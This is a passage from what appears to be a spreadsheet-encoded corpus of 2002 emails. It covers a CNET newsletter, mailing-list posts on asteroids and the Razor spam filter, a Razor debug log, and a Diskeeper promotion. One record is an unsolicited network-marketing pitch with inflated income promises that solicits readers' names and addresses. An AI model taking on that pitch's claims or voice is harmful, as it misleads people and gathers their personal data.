 &lt;a href="http://clickthru.online.com/Click?q=17-agitI5XroDrL4b9Iz4s1RhjGRsZR" &gt;&lt;b&gt;Read the review&lt;/b&gt;&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=2c-DatOIc0DRhKT2bbc-r7MBvWpjudR" &gt;&lt;b&gt;Check latest prices&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt; 
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKIeK2YLmwU5CfCkxHB0FrR" &gt;First Take: ICQ Lite Alpha&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;  
  One of our biggest beefs with ICQ has always been its
    bloated feature set. Now, the company has released a new
    "lite" ICQ that sucks up far less system memory than the
    full-fat version--but at what cost? We take a first look. 
 &lt;br&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt; 
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=56-NwKYInnsvkUTBuHrctPQDwwaMCiR" &gt;SBC Yahoo Dial&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt; 
  Thanks to a partnership with SBC Pacific Bell, Yahoo is now
    in the dial-up game. The new service, known as SBC Yahoo
    Dial, offers a customized browser, 25MB of storage, and 11
    e-mail addresses--all for $21.95 or lower, depending on
    your SBC service package. Our reviewer investigates.
 &lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcO-dlO5H80ywQ-4d0P6lR" &gt;&lt;b&gt;Read the review&lt;/b&gt;&lt;/a&gt;
 &lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt; 
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0KYP85T0DoaDkjVsTLZ89R" &gt;First Take: Winamp3 Release Candidate&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
    We've been waiting aeons for the newest version of popular
    media player Winamp. We haven't received a full new version
    yet, but AOL has partially obliged with a prerelease
    version. Winamp3 Release Candidate serves up a new interface
    and some major underlying changes. But does the new look
    muddy up Winamp's legendary ease of use?
 &lt;br&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://www.cnet.com/i/nl/sw/sub_col.gif" alt="Review" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt; 
 &lt;font face="arial, helvetica"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJfPVFtPOr1yZeU_u_KnuR" &gt;Inside @ccess: Is your ISP safe from hackers?&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt; 
    Surely, the folks who run your ISP have thought long and hard
    about security issues, but should you count on their skills to
    ward off intruders? Not wise, says our ISP expert. In this
    week's column, Dan Tynan takes security matters into his own
    hands and shows you how to protect yourself.
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=aa-gBteQXUr_Cwu_meWLXZBXqONOVsR" &gt;Read the column&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/sw/rhc_also.gif" alt="Also on CNET" width="125" height="19" border="0"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;b&gt;CNET Electronics: &lt;a href="http://clickthru.online.com/Click?q=c0-kfs-QWP2dwuRXSV41H99K8FZuS9R" &gt;Cell phone personality test--updated&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
  Choose among our five user profiles to find out what models
    best match your wireless persona. Take the test and see them
    all.
 &lt;br&gt;
 &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=d5-p-viQzL1G9bXb2qHCu4jNix1DPuR" &gt;Read the full story&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;/font&gt;
 &lt;p&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/sw/rhc_mail.gif" width="150" height="20" border="0" alt="Software Mailbag"&gt;&lt;br&gt;
 &lt;img src="http://www.cnet.com/i/nl/rule.gif" width="410" height="8" border="0"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;Import Hotmail addresses to Outlook?&lt;/b&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;font face="arial, helvetica"&gt;
 &lt;font size="-1"&gt;
   &gt;I'm running Windows 98. Everytime I try to download files&lt;br&gt;
    &gt;from the Internet, QuickTime tries to upgrade, stopping the&lt;br&gt;
    &gt;download cold. I tried to remove the software, but it won't&lt;br&gt;
    &gt;let me. Can you help? I would like to use Windows Media&lt;br&gt;
    &gt;Player instead. --Wicked
    &lt;p&gt;
  Based on your desription, we're guessing that QuickTime pops
    up when you try to stream a media file (video, audio, or MP3s)
    from the Web. If so, this probably means that you have
    QuickTime set as your default media player for all media
    files. And since your version of QuickTime is out-of-date,
    whenever it launches, it attmepts to upgrade. You could simply
    upgrade the program, or you can to turn off the autoupgrade
    feature. In QuickTime 5.0, open the program, select Edit &gt;
    Preferences &gt; QuickTime Preferences. Uncheck the box labeled
    "Check for updates automatically."
 	   &lt;p&gt;
    If, however, you simply prefer to use Windows Media Player,
    open that program, click Tools &gt; Options. Select the Formats
    tab, then check the boxes next to all of the file types that
    you want Windows Media Player to open. To make sure that
    QuickTime doesn't override your WMP settings, uncheck those
    file types within QuickTime.
 &lt;p&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ea-fjLyQhV4X0qTQHSAwQ4lAUw-5WsR" &gt;CNET reviews QuickTime 5.0&lt;/a&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=ff-sVoVQms4mnFo6wFZxrhBm0WHthZR" &gt;CNET reviews Windows Media Player 7.1&lt;/a&gt;&lt;/b&gt;
 &lt;p&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;   
 &lt;p&gt;E-mail your stories and questions to: &lt;b&gt;&lt;A HREF="mailto:software-mailbag@cnet.com"&gt;software-mailbag@cnet.com&lt;/A&gt;&lt;/b&gt;.
 &lt;p&gt;
 &lt;/font&gt;&lt;br&gt;
 &lt;P&gt;&lt;IMG border=0 height=20 src="http://www.cnet.com/Ads/Media/Images/RHC_ALSOfromCNETnet.gif" width=150 NOSEND="1"&gt; 
 &lt;IMG border=0 height=8 src="http://www.cnet.com/i/it/newsletter/rule2.gif" width=410 NOSEND="1"&gt;&lt;BR&gt;
 &lt;TABLE border=0 cellPadding=0 cellSpacing=0 width="100%25"&gt;&lt;TR vAlign=top&gt;
 &lt;TD&gt;&lt;FONT face="arial, helvetica" size=-1&gt;&lt;B&gt;
 &lt;UL&gt;
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=14-5MRAIF-zG3zqyFP8ZvQIzTKtR1dR" &gt;Live tech help: submit your questions now&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=29-Sg_rIjMAhjxZeOyNyGEI9rCM8vcR" &gt;CNET News.com: Top CIOs on the future of IT&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=3e-F51nIizXmoaAxOG_7DQESNPe-iRR" &gt;Find a job you love, with more than 1 million postings&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=53-n86dINn6ZiEUc-PjHpx8lOheMnlR" &gt;ZDNet: This IT director has had enough of Microsoft&lt;/A&gt; 
 &lt;LI&gt;&lt;a href="http://clickthru.online.com/Click?q=68-iM8qIsPPH8ygIAYywvjsK-FdLP4R" &gt;May Editors' Choice award: Pioneer's HTS-910DV&lt;/A&gt; 
 &lt;/UL&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TABLE&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
         &lt;!-- Begin search box --&gt;
         &lt;center&gt;
         &lt;table border="0" cellpadding="1" cellspacing="0" width="90%"&gt;&lt;tr&gt;&lt;td bgcolor="#CCCCCC"&gt;
         &lt;table border=0 cellspacing=0 cellpadding=0 width="100%"&gt;&lt;form method="GET" action="http://www.cnet.com/search/redirector/1,10207,0-0,00.html"&gt;
         &lt;tr align=center valign=middle bgcolor="#FFFFFF"&gt;
         &lt;td height=40 align=right nowrap&gt;&amp;nbsp;&lt;/td&gt;
         &lt;td class="f"&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;Search&lt;/b&gt;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;
         &lt;td align=left&gt;&lt;input type="Text" class="f" name="qt" size="18" maxlength="255"&gt;&lt;/td&gt;
         &lt;td&gt;&amp;nbsp;&lt;select name="tg"&gt;&lt;option value="sw-8888" selected&gt;In Software&lt;option value="nw"&gt;All CNET&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;option value="wb"&gt;The Web&lt;/select&gt;&lt;/font&gt;&lt;/center&gt;&lt;/td&gt;
         &lt;td&gt;&amp;nbsp;&lt;input name='search' type='submit' class='f' value=' Go! '&gt;&amp;nbsp;
         &lt;input type="hidden" name="tt" value="st.sw.8888.sbsr"&gt;&lt;/td&gt;
         &lt;/tr&gt;&lt;/form&gt;
         &lt;/table&gt; 
         &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt; 
         &lt;/center&gt;  
         &lt;!-- End search box --&gt;
 &lt;img src="http://www.cnet.com/b.gif" width="1" height="8" border="0"&gt;&lt;br&gt;
         &lt;/td&gt;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href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;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HREF='http://clickthru.online.com/Click?q=7e-XDMezipN37q7T_6b6pC7stkhZeXffdRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=93-V4PmQSdQ305A0HocTYjvQ8Rgn5FR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=a9-IlbqQpUxneucjeqz2JQZv91zVMcR"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href="http://clickthru.online.com/Click?q=be-B7ixQCpTprSHNQzbnY9y52GfwHRR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=d3-GZHkQJPaYHzcHVGK74p01K7fy3FR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=e8-DOJMQfk8U_DIeaRrAP_kMFIM559R" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOr1ldZyl6O_Iti64Q9t8uR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XYle6cG4-pEvKY-qkCKsR" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2GRyZMc9SkMRUVolYrBZR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e447&amp;ISSUE=2002-07-15" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=3d-oi4NnDz96XXp4Jn3sebLZXPTXsRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Has anyone considered the fact that these occurrances appear to
 be increasing. I'm aware that maybe more publicity surrounding
 some and certain agencies have been granted more funding, but 
 I'd like to see some data which shows if these are increasing
 or not. 
 Why? Well, it seems to me if we were going to get hit, the one
 that does it may have been part of a larger swarm or cluster
 which has over the years increased the distance between the
 rocks. Like the Schumaker Levy-9, which had multiple rocks
 all impacting at different times, others may have this same
 type of design and could be in different stages of increasing
 distance from one another. Also to consider is if SL-9 was
 on course for earth, would we get hit by all rocks or only
 one because the earth is a much smaller target than Jupiter?
 So, my theory is that if these near earth rocks are increasing
 so does our chance of discovering the last three were part of
 a swarm of 15 of which 10, 11 and 12 may hit.
 On 24-Jul-2002, bitbitch@magnesium.net wrote:
 &gt; &gt;
 &gt; &gt; Hit or miss, Groundhog Day 2019 is going to be one heck of a show. Book
 &gt; &gt; early, avoid the rush.
 &gt; 
 &gt; Hey, meybee by then, Bush's grand plan for a missle defense system will
 &gt; actually pan out and -work- ...
 &gt; I'm not holding my breath, but i'm not going to panic for something thats
 &gt; a little under 17 years away, either.
 &gt; -c
 &gt; 
 &gt; &gt;
 &gt; &gt; --
 &gt; &gt; Gary Lawrence Murphy &lt;garym@teledyn.com&gt; TeleDynamics Communications
 &gt; &gt; Inc Business Innovations Through Open Source Systems:
 &gt; &gt; http://www.teledyn.com "Computers are useless.  They can only give you
 &gt; &gt; answers."(Pablo Picasso)
 &gt; &gt;
 &gt; &gt; http://xent.com/mailman/listinfo/fork
 &gt; 
 &gt; 
 &gt; 
 &gt; http://xent.com/mailman/listinfo/fork
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 9 Oct 2002, Brian Fahrlander wrote:
 &gt; On Wed, 9 Oct 2002 09:15:03 -0400 (EDT), Samuel Checker &lt;sc@pffcu.org&gt; wrote:
 &gt;
 &gt; &gt; I've been testing Razor, invoked from sendmail/procmail and so far it
 &gt; &gt; seems pretty copacetic. Last night's spam to the list provided a good test
 &gt; &gt; - the spam itself as well as several of the responses were flagged, as
 &gt; &gt; other list members reported.
 &gt; &gt;
 &gt;
 &gt;     Are you using Spamassassin on the input side?  I've just changed my sendmail installation and am looking for the 'proper' way to pass it through there, systemwide, before accepting it and sending it to the users.  It's kinda problematic to set up procmail scripts for every user, when the user's home directories are NFS mounted....and the source is on my own machine, on which I try new things. (And it's the only machine with the drivespace...)
 &gt;
 I've not used Spamassassin on the KISS principle. I just have procmail
 adding an X-header and optionally modifying the Subject if razor-check
 comes back positive.
 -- 
 sc
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi -
 ( http://club.4tfox.com )
 You get emails every day, offering to show you how to make money.
 Most of these emails are from people who are NOT making any money.
 And they expect you to listen to them?
 Enough.
 If you want to make money with your computer, then you should
 hook up with a group that is actually DOING it.  We are making
 a large, continuing income every month.  What's more - we will
 show YOU how to do the same thing.
 This business is done completely by internet and email, and you
 can even join for free to check it out first.  If you can send
 an email, you can do this.  No special "skills" are required.
 How much are we making?  Anywhere from $2000 to $9000 per month.
 We are real people, and most of us work at this business part-time.
 But keep in mind, we do WORK at it - I am not going to 
 insult your intelligence by saying you can sign up, do no work,
 and rake in the cash.  That kind of job does not exist.  But if
 you are willing to put in 10-12 hours per week, this might be
 just the thing you are looking for.
 This is not income that is determined by luck, or work that is
 done FOR you - it is all based on your effort.  But, as I said,
 there are no special skills required.  And this income is RESIDUAL -
 meaning that it continues each month (and it tends to increase
 each month also).
 Interested?  I invite you to find out more.  You can get in as a
 free member, at no cost, and no obligation to continue if you
 decide it is not for you.  We are just looking for people who still
 have that "burning desire" to find an opportunity that will reward
 them incredibly well, if they work at it.
 To grab a FREE ID# and have more information, simply go to the 
  web address http://club.4tfox.com  and send me an email with following 
  information
 "Send me a free membership!"
 Be sure to include your:
 1. First name
 2. Last name
 3. Email address (if different from above)
 We will confirm your position and send you a special report
 as soon as possible, and also Your free Member Number.
 If you are not interested in tring to Earn Money,  :)
 you are interested in the huge discount from the 140 Online Shops,
 Very Cheap ISP package and many many more,
 You can also go to the web address:
 http://club.4tfox.com/#id-GreatService
 That's all there's to it.
 We'll then send you info, and you can make up your own mind.
 Looking forward to hearing from you!
 Sincerely, 
 Hugh Zou
 P.S. After having several negative experiences with network
 marketing companies I had pretty much given up on them.
 This is different - there is value, integrity, and a
 REAL opportunity to have your own home-based business...
 and finally make real money on the internet.
 Don't pass this up..you can sign up and test-drive the
 program for FREE.  All you need to do is get your free
 membership.
 Unsubscribing: Send a blank email to: removemefromlist@bigfoot.com with
 "Remove" in the subject line.  By submitting a request for a FREE
 DHS Club Membership, I agree to accept email from the DHS Club for
 both their consumer and business opportunities.
 6341syJY3-651BumD4705MRUD6-842PIIO5741fevP5-325qxvW7258Ol53
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">The following razor debugging sequence show my mail going from 9295 bytes to
 0 bytes after the preproc runs, which gives me an exit code that is not 0.
 I included the message below.
 Fox
 Razor-Log: No /etc/razor/razor-agent.conf found, skipping.
 Razor-Log: No razor-agent.conf found, using defaults.
 Aug 26 10:28:09.225237 check[3469]: [ 1] [bootup] Logging initiated
 LogDebugLevel=9 to stdout
 Aug 26 10:28:09.225890 check[3469]: [ 5] computed razorhome=/etc/razor,
 conf=, ident=/etc/razor/identity
 Aug 26 10:28:09.226006 check[3469]: [ 2] Razor-Agents v2.14 starting
 razor-check -d -home=/etc/razor
 Aug 26 10:28:09.229704 check[3469]: [ 9] uname -a: Linux qmail.mckee.com
 2.4.8-34.1mdk #1 Mon Nov 19 12:40:39 MST 2001 i686 unknown
 Aug 26 10:28:09.230155 check[3469]: [ 8] reading straight RFC822 mail from
 Aug 26 10:28:09.231524 check[3469]: [ 6] read 1 mail
 Aug 26 10:28:09.231923 check[3469]: [ 8] Client supported_engines: 1 2 3 4
 Aug 26 10:28:09.233017 check[3469]: [ 8] prep_mail done: mail 1 headers=631,
 mime0=9295
 Aug 26 10:28:09.233434 check[3469]: [ 6] skipping whitelist file (empty?):
 /etc/razor/razor-whitelist
 Aug 26 10:28:09.233995 check[3469]: [ 5] read_file: 1 items read from
 /etc/razor/servers.discovery.lst
 Aug 26 10:28:09.234369 check[3469]: [ 5] read_file: 1 items read from
 /etc/razor/servers.nomination.lst
 Aug 26 10:28:09.234697 check[3469]: [ 5] read_file: 3 items read from
 /etc/razor/servers.catalogue.lst
 Aug 26 10:28:09.235184 check[3469]: [ 9] Assigning defaults to
 honor.cloudmark.com
 Aug 26 10:28:09.235415 check[3469]: [ 9] Assigning defaults to
 truth.cloudmark.com
 Aug 26 10:28:09.235624 check[3469]: [ 9] Assigning defaults to
 fire.cloudmark.com
 Aug 26 10:28:09.235830 check[3469]: [ 9] Assigning defaults to
 apt.cloudmark.com
 Aug 26 10:28:09.236715 check[3469]: [ 5] read_file: 11 items read from
 /etc/razor/server.truth.cloudmark.com.conf
 Aug 26 10:28:09.237368 check[3469]: [ 5] read_file: 11 items read from
 /etc/razor/server.fire.cloudmark.com.conf
 Aug 26 10:28:09.237825 check[3469]: [ 5] 149643 seconds before closest
 server discovery
 Aug 26 10:28:09.238135 check[3469]: [ 6] truth.cloudmark.com is a Catalogue
 Server srl 51; computed min_cf=1, Server se: 0B
 Aug 26 10:28:09.238414 check[3469]: [ 8] Computed supported_engines: 1 2 4
 Aug 26 10:28:09.238656 check[3469]: [ 8] Using next closest server
 truth.cloudmark.com:2703, cached info srl 51
 Aug 26 10:28:09.238871 check[3469]: [ 8] mail 1 Subject: New Freeware
 Download
 Aug 26 10:28:09.290618 check[3469]: [ 6] preproc: mail 1.0 went from 9295
 bytes to 0, erasing
 Aug 26 10:28:09.291100 check[3469]: [ 5] Connecting to truth.cloudmark.com
 ...
 Aug 26 10:28:09.505431 check[3469]: [ 8] Connection established
 Aug 26 10:28:09.505662 check[3469]: [ 4] truth.cloudmark.com &gt;&gt; 29 server
 greeting: sn=C&amp;srl=51&amp;ep4=7542-10&amp;a=l
 Aug 26 10:28:09.506086 check[3469]: [ 6] truth.cloudmark.com is a Catalogue
 Server srl 51; computed min_cf=1, Server se: 0B
 Aug 26 10:28:09.506342 check[3469]: [ 8] Computed supported_engines: 1 2 4
 Aug 26 10:28:09.506604 check[3469]: [ 8] mail 1.0 skipped in check
 Aug 26 10:28:09.506686 check[3469]: [ 5] No queries, no spam
 Aug 26 10:28:09.506787 check[3469]: [ 5] disconnecting from server
 truth.cloudmark.com
 Aug 26 10:28:09.507071 check[3469]: [ 4] truth.cloudmark.com &lt;&lt; 5
 Aug 26 10:28:09.507155 check[3469]: [ 6] a=q
 Aug 26 10:28:09.507959 check[3469]: [ 8] razor-check finished successfully.
 &gt;&gt;From bounce-html-sales1-21787251@lyris.execsoft.com Mon Aug 26 14:28:10 2002
 Return-Path: &lt;bounce-html-sales1-21787251@lyris.execsoft.com&gt;
 Delivered-To: log@qmail.mckee.com
 Received: (qmail 3472 invoked from network); 26 Aug 2002 14:28:10 -0000
 Received: from unknown (HELO port-216-3073879-ds200.devices.datareturn.net)
 (216.46.231.87)
   by 10.97.5.1 with SMTP; 26 Aug 2002 14:28:05 -0000
 X-Mailer: Lyris Web Interface
 Date: Sat, 24 Aug 2002 09:45:48 -0700
 Subject: New Freeware Download
  - Jammed: eric_koester@ccmail.mckee.com
 To: &lt;trollbox@dustpuppy.mckee.com&gt;
 From: "Diskeeper Product Manager, Executive Software"
 &lt;executive@executive.com&gt;
 List-Unsubscribe: &lt;mailto:leave-html-sales1-21787251A@lyris.execsoft.com&gt;
 Reply-To: executive@executive.com
 Message-Id:
 &lt;LYRIS-21787251-20123-2002.08.24-09.47.15--eric_koester#ccmail.mckee.com@lyr
 is.execsoft.com&gt;
 MIME-Version: 1.0
 Content-Type: text/html; charset=us-ascii
 Spam-File:
 Envelope-Recipient: eric_koester@ccmail.mckee.com
 Status: RO
 &lt;!------------------------------------------------------------
 Is Maximum System Performance and Reliablilty Important to you?
 Find out what you are missing!
 New Diskeeper Lite for Windows.
 IT'S FREE!
 * Includes the same advanced defragmentation technology used in
   Diskeeper 7.0.
 * Is much faster than the previous Diskeeper Lite and all
   built-in defragmenters.
 * Now runs on Windows NT/98/2000/XP.
 Millions of downloads attest to the popularity of Diskeeper Lite,
 but it only ran on Windows NT 4.0. Now it's been updated for all
 Windows operating systems from Windows 98 onward.
 New Diskeeper Lite is still manual-only and cannot be scheduled
 or run across a network, but it is far superior to any built-in
 defragmenter and much faster. And it will show you why full-version
 Diskeeper is the most recommended automatic defragmenter ever
 built.
 Find out what you are really missing. Free!
 http://www.execsoft.com/downloads/survey.asp?PId=15&amp;ad=dkldl3
 ----------------------------------------------------------------------
 NOTICE: We periodically send new product information electronically or
 survey those individuals who voluntarily give us their e-mail address.
 We hope you enjoy receiving this timely information. However, if you
 would like to remove yourself from this list, please do not reply to
 this e-mail to be removed.
 To unsubscribe, send your e-mail address in the body of a message
 along with your name, on a separate line, to unsubscribe@executive.com.
 ----------------------------------------------------------------------------
 ----
  2002 Executive Software International, Inc. All Rights Reserved.
 DISKEEPER, Executive Software and the Executive Software logo are either
 registered trademarks or trademarks of Executive Software International,
 Inc. in the United States and/or other countries. Windows and Windows NT
 are registered trademarks of Microsoft Corporation in the United States
 and/or other countries. All other trademarks and brand names are the
 property of the respective owners.
 -------------------------------------------------------------&gt;
 &lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=windows-1252"&gt;
 &lt;title&gt;New Freeware Download&lt;/title&gt;
 &lt;/head&gt;
 &lt;body&gt;
         &lt;p align="center"&gt;
         &lt;img border="0" src="http://www2.execsoft.com/max-perf_speedo.jpg"
 width="537" height="121"&gt;&lt;img border="0"
 src="http://www2.execsoft.com/n-dkl_082302.jpg" width="470"
 height="106"&gt;&lt;/p&gt;
         &lt;table border="0" cellpadding="2" cellspacing="0"
 style="border-collapse: collapse" bordercolor="#111111" width="100%"
 id="AutoNumber2"&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;
             &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Verdana" color="#ff0000"
 size="5"&gt;IT'S
         FREE!&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
 &lt;table border="0" cellpadding="4" cellspacing="0" style="border-collapse:
 collapse" bordercolor="#111111" width="100%" id="AutoNumber1"&gt;
 &lt;tr&gt;
     &lt;td width="15" valign="top"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/td&gt;
     &lt;td width="15" valign="top"&gt;
     &lt;p&gt;&lt;font face="Times New Roman" size="2"&gt;
     &lt;span style="FONT-SIZE: 10pt"&gt;
     &lt;img src="http://www2.execsoft.com/chk-mark.gif" border="0" width="15"
 height="14"&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="100%" valign="top"&gt;&lt;font face="Verdana"&gt;Includes the same
 advanced defragmentation technology
 used in Diskeeper 7.0.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="15" valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td width="15" valign="top"&gt;&lt;font face="Times New Roman" size="2"&gt;
     &lt;span style="FONT-SIZE: 10pt"&gt;
     &lt;img src="http://www2.execsoft.com/chk-mark.gif" border="0" width="15"
 height="14"&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="100%" valign="top"&gt;&lt;font face="Verdana"&gt;Much faster than the
 previous
     Diskeeper Lite and all built-in defragmenters.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;
     &lt;td width="15" valign="top"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td width="15" valign="top"&gt;&lt;font face="Times New Roman" size="2"&gt;
     &lt;span style="FONT-SIZE: 10pt"&gt;
     &lt;img src="http://www2.execsoft.com/chk-mark.gif" border="0" width="15"
 height="14"&gt;&lt;/span&gt;&lt;/font&gt;&lt;/td&gt;
     &lt;td width="100%" valign="top"&gt;&lt;font face="Verdana"&gt;Now runs on Windows
 NT&lt;sup&gt;&lt;/sup&gt;/98/2000/XP.&lt;/font&gt;&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;Millions of downloads attest to the popularity of
 Diskeeper Lite, but it only ran on Windows NT 4.0. Now it's been updated
 for all
 Windows operating systems from Windows 98 onward.&lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;font face="Verdana"&gt;New Diskeeper Lite is still manual-only and cannot
 be
 scheduled or run across a network, but it is far superior to any built-in
 defragmenter and much faster. And it will show you why full-version
 Diskeeper is
 the most recommended automatic defragmenter ever built. &lt;/font&gt;&lt;/p&gt;
 &lt;p&gt;&lt;b&gt;&lt;font face="Verdana"&gt;Find out what you are &lt;i&gt;really&lt;/i&gt; missing.
 Free!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p style="TEXT-ALIGN: center" align="center"&gt;
 &lt;span style="FONT-SIZE: 10pt; FONT-FAMILY: Arial"&gt;
 &lt;font face="Arial" size="2"&gt;
 &lt;a href="http://www.execsoft.com/downloads/survey.asp?PId=15&amp;ad=dkldl3"&gt;
 &lt;img src="http://www2.execsoft.com/dlnowbut.gif" border="0" width="195"
 height="25" alt="Download Diskeeper Lite"&gt;&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
         &lt;table border="0" cellpadding="2" cellspacing="0"
 style="border-collapse: collapse" bordercolor="#111111" width="100%"
 id="AutoNumber4"&gt;
           &lt;tr&gt;
             &lt;td width="100%"&gt;&lt;span style="FONT-FAMILY: Verdana"&gt;&lt;font
 size="2"&gt;
             Full version Diskeeper
 available for purchase from:&lt;/font&gt;&lt;/span&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;div align="center"&gt;
           &lt;center&gt;
         &lt;table border="1" cellpadding="2" cellspacing="0"
 style="border-collapse: collapse" bordercolor="#111111" width="620"
